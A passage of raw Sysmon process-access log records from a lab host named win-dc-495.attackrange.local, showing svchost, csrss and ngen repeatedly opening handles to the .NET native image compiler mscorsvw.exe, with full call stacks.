svc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:03.166{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920B-6005-8903-00000000A301}3600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:03.150{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920B-6005-8903-00000000A301}3600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:03.150{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920B-6005-8903-00000000A301}3600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:04.588{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920C-6005-8E03-00000000A301}4424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:04.572{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920C-6005-8E03-00000000A301}4424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:04.572{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920C-6005-8E03-00000000A301}4424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:04.447{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920C-6005-8D03-00000000A301}880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:04.432{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920C-6005-8D03-00000000A301}880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:04.432{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920C-6005-8D03-00000000A301}880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:04.307{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920C-6005-8C03-00000000A301}2188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:04.291{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920C-6005-8C03-00000000A301}2188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:04.291{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920C-6005-8C03-00000000A301}2188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:03.994{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920B-6005-8B03-00000000A301}4608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:05.588{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920D-6005-9203-00000000A301}4528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:05.572{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920D-6005-9203-00000000A301}4528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:05.572{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920D-6005-9203-00000000A301}4528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:05.463{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920D-6005-9103-00000000A301}4872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:05.447{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-920D-6005-9103-00000000A301}4872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:05.447{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920D-6005-9103-00000000A301}4872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:05.322{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920D-6005-9003-00000000A301}648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:05.307{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920D-6005-9003-00000000A301}648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:05.307{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920D-6005-9003-00000000A301}648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:05.228{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920D-6005-8F03-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 